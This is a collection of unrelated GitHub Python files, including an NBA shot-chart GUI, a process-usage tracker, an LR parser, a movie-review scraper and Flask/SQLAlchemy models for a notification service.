print("{}% of data lies within 3 standard deviations".format(len(list_of_data_within_3_std_dev)*100.0/len(finalData))) | Asaawari/Properties-of-Normal-Distribution | code.py | code.py | py | 1,660 | python | en | code | 0 | github-code | 13 |
71040828497 | from tkinter import *
from tkinter import filedialog
from nba_api.stats.endpoints import shotchartdetail
import json
import requests
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
import customtkinter
# Load teams file
teams = json.loads(requests.get('https://raw.githubusercontent.com/bttmly/nba/master/data/teams.json').text)
# Load players file
players = json.loads(requests.get('https://raw.githubusercontent.com/bttmly/nba/master/data/players.json').text)
# Get team ID based on team name
def get_team_id(team_name):
for team in teams:
if team['teamName'] == team_name:
return team['teamId']
return -1
# Get player ID based on player name
def get_player_id(first, last):
for player in players:
if player['firstName'] == first and player['lastName'] == last:
return player['playerId']
return -1
def create_court(ax, color):
# Short corner 3PT lines
ax.plot([-220, -220], [0, 140], linewidth=2, color=color)
ax.plot([220, 220], [0, 140], linewidth=2, color=color)
# 3PT Arc
ax.add_artist(mpl.patches.Arc((0, 140), 440, 315, theta1=0, theta2=180, facecolor='none', edgecolor=color, lw=2))
# Lane and Key
ax.plot([-80, -80], [0, 190], linewidth=2, color=color)
ax.plot([80, 80], [0, 190], linewidth=2, color=color)
ax.plot([-60, -60], [0, 190], linewidth=2, color=color)
ax.plot([60, 60], [0, 190], linewidth=2, color=color)
ax.plot([-80, 80], [190, 190], linewidth=2, color=color)
ax.add_artist(mpl.patches.Circle((0, 190), 60, facecolor='none', edgecolor=color, lw=2))
# Rim
ax.add_artist(mpl.patches.Circle((0, 60), 15, facecolor='none', edgecolor=color, lw=2))
# Backboard
ax.plot([-30, 30], [40, 40], linewidth=2, color=color)
# Remove ticks
ax.set_xticks([])
ax.set_yticks([])
# Set axis limits
ax.set_xlim(-250, 250)
ax.set_ylim(0, 470)
return ax
def create_plot():
# Get user input from GUI
player_name = player_name_entry.get()
team_name = team_name_entry.get()
year = year_entry.get()
# Get player ID
first, last = player_name.split()
player_id = get_player_id(first, last)
# Create JSON request
shot_json = shotchartdetail.ShotChartDetail(
team_id=get_team_id(team_name),
player_id=player_id,
context_measure_simple='PTS',
season_nullable=year,
season_type_all_star='Regular Season')
shot_data = json.loads(shot_json.get_json())
relevant_data = shot_data['resultSets'][0]
headers = relevant_data['headers']
rows = relevant_data['rowSet']
# Create pandas DataFrame
player_data = pd.DataFrame(rows)
player_data.columns = headers
mpl.rcParams['font.family'] = 'Avenir'
mpl.rcParams['font.size'] = 18
mpl.rcParams['axes.linewidth'] = 2
# Create figure and axes
fig = plt.figure(figsize=(4, 3.76))
ax = fig.add_axes([0, 0, 1, 1])
ax.set_title(f"{player_name} ({year}) Stats")
# Draw court
ax = create_court(ax, 'black')
# Plot hexbin of shots
ax.hexbin(player_data['LOC_X'], player_data['LOC_Y'] + 60, gridsize=(30, 30), extent=(-300, 300, 0, 940), bins='log', cmap='Reds')
# Annotate player name and season
ax.text(0, 1.05, f'{player_name}\n{year} Regular Season', transform=ax.transAxes, ha='left', va='baseline')
# save the figure with a filename based on the player name and year
filename = f"{player_name}_{year}_stats.png"
fig.savefig(filename)
plt.show()
# Create a tkinter window
root = customtkinter.CTk()
root.title("NBA Shot Chart")
root.geometry(f"{500}x{250}")
# Create input fields and labels
player_name_label = customtkinter.CTkLabel(root, text="Player Name (First Last): ")
player_name_label.grid(row=1, column=0, pady=10)
player_name_entry = customtkinter.CTkEntry(root)
player_name_entry.grid(row=1, column=1, ipadx="100", pady=10)
team_name_label = customtkinter.CTkLabel(root, text="Team (Name City): ")
team_name_label.grid(row=2, column=0, pady=10)
team_name_entry = customtkinter.CTkEntry(root)
team_name_entry.grid(row=2, column=1, ipadx="100", pady=10)
year_label = customtkinter.CTkLabel(root, text="Year (YYYY-YY): ")
year_label.grid(row=3,column=0, pady=10)
year_entry = customtkinter.CTkEntry(root)
year_entry.grid(row=3, column=1, ipadx="100", pady=10)
# Create a button to trigger data retrieval and visualization
visualize_button = customtkinter.CTkButton(root, text="Generate Shot Chart", command=create_plot)
visualize_button.grid(row=4,column=1, pady=10)
# Start the tkinter main loop
root.mainloop() | eramadani3/NBA-Analysis-Tool | Analysis/shotChart.py | shotChart.py | py | 4,624 | python | en | code | 0 | github-code | 13 |
16080882005 | """
Created on Wed Feb 17 11:25:2503 2021
@author: Sule
@name: command_line.py
@description: ->
DOCSTRING:
"""
#!/usr/bin/env python3
# Importing the libraries
from threading import Timer
from sys import exit
from datetime import datetime
import wmi
import pythoncom
import mysql.connector
class Process():
"""
DOCSTRING:
"""
def __init__(self, id, name, caption, type, date, daily, monthly, yearly, all_time):
"""
DOCSTRING:
"""
self.id = id
self.name = name
self.caption = caption
self.type = type
self.date = date
self.daily = daily
self.monthly = monthly
self.yearly = yearly
self.all_time = all_time
self.time_started = datetime.now()
self.active = False
def check_date(self, mydb, mycursor):
"""
DOCSTRING:
"""
today = datetime.now()
if today.day != self.date.day:
self.daily = 0
if today.month != self.date.month:
self.monthly = 0
if today.year != self.date.year:
self.yearly = 0
sql = "UPDATE apps SET daily=%s, monthly=%s, yearly=%s WHERE id=%s"
val = (self.daily, self.monthly, self.yearly, self.id, )
mycursor.execute(sql, val)
mydb.commit()
class App():
"""
DOCSTRING:
"""
def __init__(self, mydb, mycursor):
"""
DOCSTRING:
"""
self.mydb = mydb
self.mycursor = mycursor
self.caption_list = self.get_captions_from_db()
self.process_list = self.get_processes_from_db()
self.check_date()
def check_date(self):
"""
DOCSTRING:
"""
for process in self.process_list:
process.check_date(self.mydb, self.mycursor)
def get_captions_from_db(self):
"""
DOCSTRING:
"""
caption_list = {}
self.mycursor.execute("SELECT id, caption FROM apps")
result = self.mycursor.fetchall()
for row in result:
caption_list[row[1]] = row[0]
return caption_list
def get_processes_from_db(self):
"""
DOCSTRING:
"""
process_list = []
self.mycursor.execute("SELECT * FROM apps")
result = self.mycursor.fetchall()
for row in result:
process = Process(row[0], row[1], row[2], row[3], row[4], row[5], row[6], row[7], row[8])
process_list.append(process)
return process_list
def check_for_change(self):
"""
DOCSTRING:
"""
c = wmi.WMI()
active_list = [x for x in self.process_list if x.active]
inactive_list = [x for x in self.process_list if not x.active]
for tmp in self.process_list:
tmp.active = False
for process in c.Win32_Process(["Caption"]):
if process.Caption in self.caption_list:
id = self.caption_list[process.Caption] - 1
current_proc = self.process_list[id]
if not current_proc.active:
current_proc.active = True
for tmp in active_list:
if not self.process_list[tmp.id-1].active:
self.process_shutdown(tmp)
for tmp in inactive_list:
if self.process_list[tmp.id-1].active:
self.process_start(tmp)
return [x for x in self.process_list if x.active], [x for x in self.process_list if not x.active]
def process_start(self, process):
"""
DOCSTRING:
"""
process.time_started = datetime.now()
print(f'[+] Starting {process.name}...')
def process_shutdown(self, process):
"""
DOCSTRING:
"""
time_finished = datetime.now()
duration = int((time_finished - process.time_started).total_seconds())
date = datetime.now()
process.daily += duration
process.monthly += duration
process.yearly += duration
process.all_time += duration
sql = "UPDATE apps SET date=%s, daily=%s, monthly=%s, yearly=%s, all_time=%s WHERE id=%s"
val = (date, process.daily, process.monthly, process.yearly, process.all_time, process.id, )
self.mycursor.execute(sql, val)
self.mydb.commit()
print(f'[-] Shuting down {process.name}... ({duration}s)')
def run(self):
"""
DOCSTRING:
"""
pythoncom.CoInitialize()
active_list, inactive_list = self.check_for_change()
timer = Timer(9.0, self.run)
timer.start()
def main():
"""
DOCSTRING:
"""
try:
mydb = mysql.connector.connect(
host='localhost',
user='root',
passwd='',
database='process_watcher'
)
mycursor = mydb.cursor()
except mysql.connector.errors.InterfaceError:
print('[-] Cant connect to DB.')
exit()
app = App(mydb, mycursor)
app.run()
if __name__ == '__main__':
main()
| nikola-supic/process_watcher | command_line.py | command_line.py | py | 5,073 | python | en | code | 0 | github-code | 13 |
15805245776 | import argparse
from tools.tools import *
if __name__ == "__main__":
print('''
__
______ ____ ____ | | __
/ ___// __ \_/ __ \| |/ /
\___ \\\\ ___/\ ___/| <
/____ >\___ >\___ >__|_ \\
\/ \/ \/ \/
version 1.0.2
auhtor: iami233
''')
description = "此工具允许您执行与IP和域名相关的操作,包括同IP站点查找和域名信息查询。\nExample: python main.py -file assets.txt"
parser = argparse.ArgumentParser(description=description, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("-file", dest="file_path", help="Path to the assets file")
args = parser.parse_args()
try:
data = process_assets(args.file_path)
except:
parser.print_help() | 5ime/Seek | seek.py | seek.py | py | 815 | python | en | code | 12 | github-code | 13 |
35921111405 | import json
from anytree import Node, RenderTree
from scanner import Scanner
class Parser:
def __init__(self, scanner: Scanner, grammar_json) -> None:
self.scanner = scanner
grammar = json.load(open(grammar_json))
self.terminals = grammar['terminals']
self.non_terminals = grammar['non_terminals']
self.first = grammar['first']
self.follow = grammar['follow']
self.grammar = grammar['grammar']
self.parse_table = grammar['parse_table']
self.stack_state = ["0"]
self.stack_token = []
self.token = [None, None]
self.action = "shift"
self.root = None
self.nodes = []
self.error = False
self.err_string = ""
def parse(self):
while (self.action != "accept"):
if self.token[0] is None:
token, string = self.scanner.get_next_token()
self.token = [token, string]
self.token[0] = string if token in [
"KEYWORD", "SYMBOL"] else token
try:
self.action = self.parse_table[self.stack_state[-1]
][self.token[0]]
except:
self.action = "PANIC"
if self.action == ("accept"):
continue
elif self.action.startswith("shift"):
self.update_stack(self.token, Node(
"({}, {})".format(token, string)))
self.token = ["$", "$"] if self.token[0] == "$" else [
None, None]
elif self.action.startswith("reduce"):
production_rule = self.grammar[self.action.split("_")[1]]
self.root = Node(production_rule[0])
if self.root.name == "program":
end = Node("$", parent=self.root)
if production_rule[-1] != 'epsilon':
self.stack_token = self.stack_token[:2 -
len(production_rule)]
self.stack_state = self.stack_state[: 2 -
len(production_rule)]
for i in range(len(production_rule) - 2):
if len(self.nodes) > 0:
top = self.nodes.pop()[1]
top.parent = self.root
else:
top = Node("epsilon")
top.parent = self.root
self.action = self.parse_table[self.stack_state[-1]
][production_rule[0]]
self.update_stack([production_rule[0], None], self.root)
else:
self.error = True
self.err_string += f'#{self.scanner.line_index + 1} : syntax error , illegal {self.token[1]}\n'
# a) Skip the current input symbol
token, string = self.scanner.get_next_token()
if token == "$":
self.err_string += f'#{self.scanner.line_index} : syntax error , Unexpected EOF\n'
self.write_files()
return
self.token = [token, string]
self.token[0] = string if token in [
"KEYWORD", "SYMBOL"] else token
# a) Remove until you reach a goto
while(not any(value.startswith("goto")
for value in list(self.parse_table[self.stack_state[-1]].values()))):
self.err_string += f'syntax error , discarded {self.discard_token(self.stack_token[-1])} from stack\n'
self.stack_state.pop()
self.stack_token.pop()
discard = True
while discard:
list_of_gotos = []
for key, value in self.parse_table[self.stack_state[-1]].items():
if "goto" in value and key in self.non_terminals:
list_of_gotos.append((key, value))
list_of_gotos = sorted(
list_of_gotos, key=lambda x: x[0])
# c) Stack the nonterminal and goto
for rule_goto in list_of_gotos:
(non_terminal, state) = rule_goto
if self.token[0] in self.follow[non_terminal]:
discard = False
self.err_string += f'#{self.scanner.line_index + 1} : syntax error , missing {non_terminal}\n'
self.stack_token.append([non_terminal, None])
action = self.parse_table[self.stack_state[-1]
][non_terminal]
self.stack_state.append(action.split("_")[1])
break
# b) Discard zero or more input symbols
if discard:
self.err_string += f'#{self.scanner.line_index + 1} : syntax error , discarded {self.token[1]} from input\n'
token, string = self.scanner.get_next_token()
if token == "$":
self.err_string += f'#{self.scanner.line_index + 1} : syntax error , Unexpected EOF\n'
self.write_files()
return
self.token = [token, string]
self.token[0] = string if token in [
"KEYWORD", "SYMBOL"] else token
self.write_files()
def discard_token(self, token):
if token[1] is None:
return token[0]
if token[1] in self.scanner.KEYWORD:
return f"(KEYWORD, {token[1]})"
elif token[1] in (self.scanner.SYMBOL + self.scanner.EXTRA + ["=="]):
return f"(SYMBOL, {token[1]})"
return f"({token[0]}, {token[1]})"
def update_stack(self, token, node: Node):
if self.action == "accept":
return
self.stack_token.append(token)
self.stack_state.append(self.action.split("_")[1])
self.nodes.append([node.name, node])
def write_files(self):
with open('parse_tree.txt', 'a', encoding='utf-8') as f:
for pre, fill, node in RenderTree(self.root, childiter=reversed):
f.write("%s%s\n" % (pre, node.name))
f.close()
with open('syntax_errors.txt', 'a', encoding='utf-8') as f:
if not self.error:
f.write("There is no syntax error.")
else:
f.write(self.err_string)
f.close()
| hamilamailee/Compiler-Design | lrparser.py | lrparser.py | py | 6,757 | python | en | code | 0 | github-code | 13 |
721675923 | import urllib ,sqlite3
from bs4 import BeautifulSoup
params = urllib.parse.urlencode({'page':1})
url='https://movie.naver.com/movie/point/af/list.nhn?&%s' %params
#print(url)
response = urllib.request.urlopen(url)
#print(response)
navigator = BeautifulSoup(response,'html.parser')
table = navigator.find('table',class_='list_netizen')
#print(table)
list_records=[]
for i,r in enumerate(table.find_all('tr')):
for j,c in enumerate(r.find_all('td')):
if j == 0:
record={'번호':int(c.text.strip())}
elif j==2:
record.update({'평점':int(c.text.strip())})
elif j==3:
record.update({'영화':str(c.find('a',class_='movie').text.strip())})
record.update({'140자 평':str(c.text).split('\n')[2]})
elif j==4:
record.update({'글쓴이':c.find('a',class_='author').text.strip()})
record.update({'날짜':str(c.text).split('****')[1]})
try:
list_records.append(record)
except:
pass
#print(list_records)
conn = sqlite3.connect('d:/pythonwork/clolling/example.db')
c = conn.cursor()
c.execute('''create table if not exists movies
(Number real , grade real , movie text , Reviews text , author text , data text)''')
list_value = []
for i in list_records:
list_value.append(tuple(i.values()))
print(list_value)
c.executemany('INSERT INTO movies VALUES(?,?,?,?,?,?)',list_value)
conn.commit()
| sweetfruit77/Test | crawling/BeautifulSoup11.py | BeautifulSoup11.py | py | 1,442 | python | en | code | 0 | github-code | 13 |
1135510907 | import datetime
import itertools
import uuid
from flask import current_app, url_for
from notifications_utils.clients.encryption.encryption_client import EncryptionError
from notifications_utils.recipients import (
InvalidEmailError,
InvalidPhoneError,
try_validate_and_format_phone_number,
validate_email_address,
validate_phone_number,
)
from notifications_utils.template import PlainTextEmailTemplate, SMSMessageTemplate
from sqlalchemy import CheckConstraint, Index, UniqueConstraint
from sqlalchemy.dialects.postgresql import JSON, JSONB, UUID
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.ext.declarative import declared_attr
from sqlalchemy.orm import validates
from sqlalchemy.orm.collections import attribute_mapped_collection
from app import db, encryption
from app.hashing import check_hash, hashpw
from app.history_meta import Versioned
from app.utils import (
DATETIME_FORMAT,
DATETIME_FORMAT_NO_TIMEZONE,
get_dt_string_or_none,
)
SMS_TYPE = "sms"
EMAIL_TYPE = "email"
LETTER_TYPE = "letter"
TEMPLATE_TYPES = [SMS_TYPE, EMAIL_TYPE]
NOTIFICATION_TYPES = [SMS_TYPE, EMAIL_TYPE]
template_types = db.Enum(*TEMPLATE_TYPES, name="template_type")
NORMAL = "normal"
PRIORITY = "priority"
TEMPLATE_PROCESS_TYPE = [NORMAL, PRIORITY]
SMS_AUTH_TYPE = "sms_auth"
EMAIL_AUTH_TYPE = "email_auth"
WEBAUTHN_AUTH_TYPE = "webauthn_auth"
USER_AUTH_TYPES = [SMS_AUTH_TYPE, EMAIL_AUTH_TYPE, WEBAUTHN_AUTH_TYPE]
DELIVERY_STATUS_CALLBACK_TYPE = "delivery_status"
COMPLAINT_CALLBACK_TYPE = "complaint"
SERVICE_CALLBACK_TYPES = [DELIVERY_STATUS_CALLBACK_TYPE, COMPLAINT_CALLBACK_TYPE]
def filter_null_value_fields(obj):
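    """Return a copy of the mapping with None-valued entries removed."""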
    return {key: value for key, value in obj.items() if value is not None}
class HistoryModel:
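    """Mixin for *History models: copies matching column values from the live row."""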
@classmethod
def from_original(cls, original):
history = cls()
history.update_from_original(original)
return history
def update_from_original(self, original):
for c in self.__table__.columns:
# in some cases, columns may have different names to their underlying db column - so only copy those
# that we can, and leave it up to subclasses to deal with any oddities/properties etc.
if hasattr(original, c.name):
setattr(self, c.name, getattr(original, c.name))
else:
current_app.logger.debug(
"{} has no column {} to copy from".format(original, c.name)
)
class User(db.Model):
__tablename__ = "users"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
name = db.Column(db.String, nullable=False, index=True, unique=False)
email_address = db.Column(db.String(255), nullable=False, index=True, unique=True)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
_password = db.Column(db.String, index=False, unique=False, nullable=False)
mobile_number = db.Column(db.String, index=False, unique=False, nullable=True)
password_changed_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
logged_in_at = db.Column(db.DateTime, nullable=True)
failed_login_count = db.Column(db.Integer, nullable=False, default=0)
state = db.Column(db.String, nullable=False, default="pending")
platform_admin = db.Column(db.Boolean, nullable=False, default=False)
current_session_id = db.Column(UUID(as_uuid=True), nullable=True)
auth_type = db.Column(
db.String,
db.ForeignKey("auth_type.name"),
index=True,
nullable=False,
default=SMS_AUTH_TYPE,
)
email_access_validated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
    # either email auth or a mobile number must be provided
    # NB: this constraint is not listed in __table_args__, so SQLAlchemy never
    # attaches it to the table; it documents the rule rather than enforcing it
    CheckConstraint(
        "auth_type in ('email_auth', 'webauthn_auth') or mobile_number is not null"
    )
services = db.relationship("Service", secondary="user_to_service", backref="users")
organizations = db.relationship(
"Organization", secondary="user_to_organization", backref="users"
)
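    # runs on assignment; the value returned by the validator is what gets stored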
@validates("mobile_number")
def validate_mobile_number(self, key, number):
try:
if number is not None:
return validate_phone_number(number, international=True)
except InvalidPhoneError as err:
raise ValueError(str(err)) from err
    @property
    def password(self):
        raise AttributeError("Password not readable")

    @password.setter
    def password(self, password):
        self._password = hashpw(password)

    @property
    def can_use_webauthn(self):
        # platform admins, webauthn users and members of the Notify service
        # itself may authenticate with a security key
        if self.platform_admin:
            return True
        if self.auth_type == "webauthn_auth":
            return True
        return any(
            str(service.id) == current_app.config["NOTIFY_SERVICE_ID"]
            for service in self.services
        )
def check_password(self, password):
return check_hash(password, self._password)
def get_permissions(self, service_id=None):
from app.dao.permissions_dao import permission_dao
if service_id:
return [
x.permission
for x in permission_dao.get_permissions_by_user_id_and_service_id(
self.id, service_id
)
]
retval = {}
for x in permission_dao.get_permissions_by_user_id(self.id):
service_id = str(x.service_id)
if service_id not in retval:
retval[service_id] = []
retval[service_id].append(x.permission)
return retval
def serialize(self):
return {
"id": self.id,
"name": self.name,
"email_address": self.email_address,
"auth_type": self.auth_type,
"current_session_id": self.current_session_id,
"failed_login_count": self.failed_login_count,
"email_access_validated_at": self.email_access_validated_at.strftime(
DATETIME_FORMAT
),
"logged_in_at": get_dt_string_or_none(self.logged_in_at),
"mobile_number": self.mobile_number,
"organizations": [x.id for x in self.organizations if x.active],
"password_changed_at": self.password_changed_at.strftime(
DATETIME_FORMAT_NO_TIMEZONE
),
"permissions": self.get_permissions(),
"platform_admin": self.platform_admin,
"services": [x.id for x in self.services if x.active],
"can_use_webauthn": self.can_use_webauthn,
"state": self.state,
}
def serialize_for_users_list(self):
return {
"id": self.id,
"name": self.name,
"email_address": self.email_address,
"mobile_number": self.mobile_number,
}
class ServiceUser(db.Model):
__tablename__ = "user_to_service"
user_id = db.Column(UUID(as_uuid=True), db.ForeignKey("users.id"), primary_key=True)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), primary_key=True
)
__table_args__ = (
UniqueConstraint("user_id", "service_id", name="uix_user_to_service"),
)
user_to_organization = db.Table(
"user_to_organization",
db.Model.metadata,
db.Column("user_id", UUID(as_uuid=True), db.ForeignKey("users.id")),
db.Column("organization_id", UUID(as_uuid=True), db.ForeignKey("organization.id")),
UniqueConstraint("user_id", "organization_id", name="uix_user_to_organization"),
)
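# the composite foreign keys below ensure the user is a member of the service
# and that the folder belongs to that same service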
user_folder_permissions = db.Table(
"user_folder_permissions",
db.Model.metadata,
db.Column("user_id", UUID(as_uuid=True), primary_key=True),
db.Column(
"template_folder_id",
UUID(as_uuid=True),
db.ForeignKey("template_folder.id"),
primary_key=True,
),
db.Column("service_id", UUID(as_uuid=True), primary_key=True),
db.ForeignKeyConstraint(
["user_id", "service_id"],
["user_to_service.user_id", "user_to_service.service_id"],
),
db.ForeignKeyConstraint(
["template_folder_id", "service_id"],
["template_folder.id", "template_folder.service_id"],
),
)
BRANDING_GOVUK = "govuk" # Deprecated outside migrations
BRANDING_ORG = "org"
BRANDING_BOTH = "both"
BRANDING_ORG_BANNER = "org_banner"
BRANDING_TYPES = [BRANDING_ORG, BRANDING_BOTH, BRANDING_ORG_BANNER]
class BrandingTypes(db.Model):
__tablename__ = "branding_type"
name = db.Column(db.String(255), primary_key=True)
class EmailBranding(db.Model):
__tablename__ = "email_branding"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
colour = db.Column(db.String(7), nullable=True)
logo = db.Column(db.String(255), nullable=True)
name = db.Column(db.String(255), unique=True, nullable=False)
text = db.Column(db.String(255), nullable=True)
brand_type = db.Column(
db.String(255),
db.ForeignKey("branding_type.name"),
index=True,
nullable=False,
default=BRANDING_ORG,
)
def serialize(self):
serialized = {
"id": str(self.id),
"colour": self.colour,
"logo": self.logo,
"name": self.name,
"text": self.text,
"brand_type": self.brand_type,
}
return serialized
service_email_branding = db.Table(
"service_email_branding",
db.Model.metadata,
# service_id is a primary key as you can only have one email branding per service
db.Column(
"service_id",
UUID(as_uuid=True),
db.ForeignKey("services.id"),
primary_key=True,
nullable=False,
),
db.Column(
"email_branding_id",
UUID(as_uuid=True),
db.ForeignKey("email_branding.id"),
nullable=False,
),
)
INTERNATIONAL_SMS_TYPE = "international_sms"
INBOUND_SMS_TYPE = "inbound_sms"
SCHEDULE_NOTIFICATIONS = "schedule_notifications"
EMAIL_AUTH = "email_auth"
UPLOAD_DOCUMENT = "upload_document"
EDIT_FOLDER_PERMISSIONS = "edit_folder_permissions"
SERVICE_PERMISSION_TYPES = [
EMAIL_TYPE,
SMS_TYPE,
INTERNATIONAL_SMS_TYPE,
INBOUND_SMS_TYPE,
SCHEDULE_NOTIFICATIONS,
EMAIL_AUTH,
UPLOAD_DOCUMENT,
EDIT_FOLDER_PERMISSIONS,
]
class ServicePermissionTypes(db.Model):
__tablename__ = "service_permission_types"
name = db.Column(db.String(255), primary_key=True)
class Domain(db.Model):
__tablename__ = "domain"
domain = db.Column(db.String(255), primary_key=True)
organization_id = db.Column(
"organization_id",
UUID(as_uuid=True),
db.ForeignKey("organization.id"),
nullable=False,
)
ORGANIZATION_TYPES = ["federal", "state", "other"]
class OrganizationTypes(db.Model):
__tablename__ = "organization_types"
name = db.Column(db.String(255), primary_key=True)
annual_free_sms_fragment_limit = db.Column(db.BigInteger, nullable=False)
class Organization(db.Model):
__tablename__ = "organization"
id = db.Column(
UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=False
)
name = db.Column(db.String(255), nullable=False, unique=True, index=True)
active = db.Column(db.Boolean, nullable=False, default=True)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
agreement_signed = db.Column(db.Boolean, nullable=True)
agreement_signed_at = db.Column(db.DateTime, nullable=True)
agreement_signed_by_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("users.id"),
nullable=True,
)
agreement_signed_by = db.relationship("User")
agreement_signed_on_behalf_of_name = db.Column(db.String(255), nullable=True)
agreement_signed_on_behalf_of_email_address = db.Column(
db.String(255), nullable=True
)
agreement_signed_version = db.Column(db.Float, nullable=True)
organization_type = db.Column(
db.String(255),
db.ForeignKey("organization_types.name"),
unique=False,
nullable=True,
)
request_to_go_live_notes = db.Column(db.Text)
domains = db.relationship(
"Domain",
)
email_branding = db.relationship("EmailBranding")
email_branding_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("email_branding.id"),
nullable=True,
)
notes = db.Column(db.Text, nullable=True)
purchase_order_number = db.Column(db.String(255), nullable=True)
billing_contact_names = db.Column(db.Text, nullable=True)
billing_contact_email_addresses = db.Column(db.Text, nullable=True)
billing_reference = db.Column(db.String(255), nullable=True)
@property
def live_services(self):
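        # active services that are no longer restricted (i.e. out of trial mode)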
return [
service
for service in self.services
if service.active and not service.restricted
]
@property
def domain_list(self):
return [domain.domain for domain in self.domains]
def serialize(self):
return {
"id": str(self.id),
"name": self.name,
"active": self.active,
"organization_type": self.organization_type,
"email_branding_id": self.email_branding_id,
"agreement_signed": self.agreement_signed,
"agreement_signed_at": self.agreement_signed_at,
"agreement_signed_by_id": self.agreement_signed_by_id,
"agreement_signed_on_behalf_of_name": self.agreement_signed_on_behalf_of_name,
"agreement_signed_on_behalf_of_email_address": self.agreement_signed_on_behalf_of_email_address,
"agreement_signed_version": self.agreement_signed_version,
"domains": self.domain_list,
"request_to_go_live_notes": self.request_to_go_live_notes,
"count_of_live_services": len(self.live_services),
"notes": self.notes,
"purchase_order_number": self.purchase_order_number,
"billing_contact_names": self.billing_contact_names,
"billing_contact_email_addresses": self.billing_contact_email_addresses,
"billing_reference": self.billing_reference,
}
def serialize_for_list(self):
return {
"name": self.name,
"id": str(self.id),
"active": self.active,
"count_of_live_services": len(self.live_services),
"domains": self.domain_list,
"organization_type": self.organization_type,
}
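# the Versioned mixin (app.history_meta) records every change to this model in
# a parallel history table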
class Service(db.Model, Versioned):
__tablename__ = "services"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
name = db.Column(db.String(255), nullable=False, unique=True)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
active = db.Column(
db.Boolean, index=False, unique=False, nullable=False, default=True
)
message_limit = db.Column(db.BigInteger, index=False, unique=False, nullable=False)
total_message_limit = db.Column(
db.BigInteger, index=False, unique=False, nullable=False
)
restricted = db.Column(db.Boolean, index=False, unique=False, nullable=False)
email_from = db.Column(db.Text, index=False, unique=True, nullable=False)
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
created_by = db.relationship("User", foreign_keys=[created_by_id])
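    # whether the service name is prepended to outbound text messages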
prefix_sms = db.Column(db.Boolean, nullable=False, default=True)
organization_type = db.Column(
db.String(255),
db.ForeignKey("organization_types.name"),
unique=False,
nullable=True,
)
rate_limit = db.Column(db.Integer, index=False, nullable=False, default=3000)
contact_link = db.Column(db.String(255), nullable=True, unique=False)
volume_sms = db.Column(db.Integer(), nullable=True, unique=False)
volume_email = db.Column(db.Integer(), nullable=True, unique=False)
consent_to_research = db.Column(db.Boolean, nullable=True)
count_as_live = db.Column(db.Boolean, nullable=False, default=True)
go_live_user_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=True
)
go_live_user = db.relationship("User", foreign_keys=[go_live_user_id])
go_live_at = db.Column(db.DateTime, nullable=True)
organization_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("organization.id"), index=True, nullable=True
)
organization = db.relationship("Organization", backref="services")
notes = db.Column(db.Text, nullable=True)
purchase_order_number = db.Column(db.String(255), nullable=True)
billing_contact_names = db.Column(db.Text, nullable=True)
billing_contact_email_addresses = db.Column(db.Text, nullable=True)
billing_reference = db.Column(db.String(255), nullable=True)
email_branding = db.relationship(
"EmailBranding",
secondary=service_email_branding,
uselist=False,
backref=db.backref("services", lazy="dynamic"),
)
@classmethod
def from_json(cls, data):
"""
Assumption: data has been validated appropriately.
Returns a Service object based on the provided data. Deserialises created_by to created_by_id as marshmallow
would.
"""
# validate json with marshmallow
fields = data.copy()
fields["created_by_id"] = fields.pop("created_by")
return cls(**fields)
def get_inbound_number(self):
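        # returns None implicitly when the service has no active inbound number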
if self.inbound_number and self.inbound_number.active:
return self.inbound_number.number
def get_default_sms_sender(self):
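        # assumes the service has a default sender; raises IndexError otherwise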
default_sms_sender = [x for x in self.service_sms_senders if x.is_default]
return default_sms_sender[0].sms_sender
def get_default_reply_to_email_address(self):
default_reply_to = [x for x in self.reply_to_email_addresses if x.is_default]
return default_reply_to[0].email_address if default_reply_to else None
def has_permission(self, permission):
return permission in [p.permission for p in self.permissions]
def serialize_for_org_dashboard(self):
return {
"id": str(self.id),
"name": self.name,
"active": self.active,
"restricted": self.restricted,
}
class AnnualBilling(db.Model):
__tablename__ = "annual_billing"
id = db.Column(
UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=False
)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=False,
index=True,
nullable=False,
)
financial_year_start = db.Column(
db.Integer, nullable=False, default=True, unique=False
)
free_sms_fragment_limit = db.Column(
db.Integer, nullable=False, index=False, unique=False
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
service = db.relationship(
Service, backref=db.backref("annual_billing", uselist=True)
)
__table_args__ = (
UniqueConstraint(
"service_id",
"financial_year_start",
name="uix_service_id_financial_year_start",
),
)
def serialize_free_sms_items(self):
return {
"free_sms_fragment_limit": self.free_sms_fragment_limit,
"financial_year_start": self.financial_year_start,
}
def serialize(self):
def serialize_service():
return {"id": str(self.service_id), "name": self.service.name}
return {
"id": str(self.id),
"free_sms_fragment_limit": self.free_sms_fragment_limit,
"service_id": self.service_id,
"financial_year_start": self.financial_year_start,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
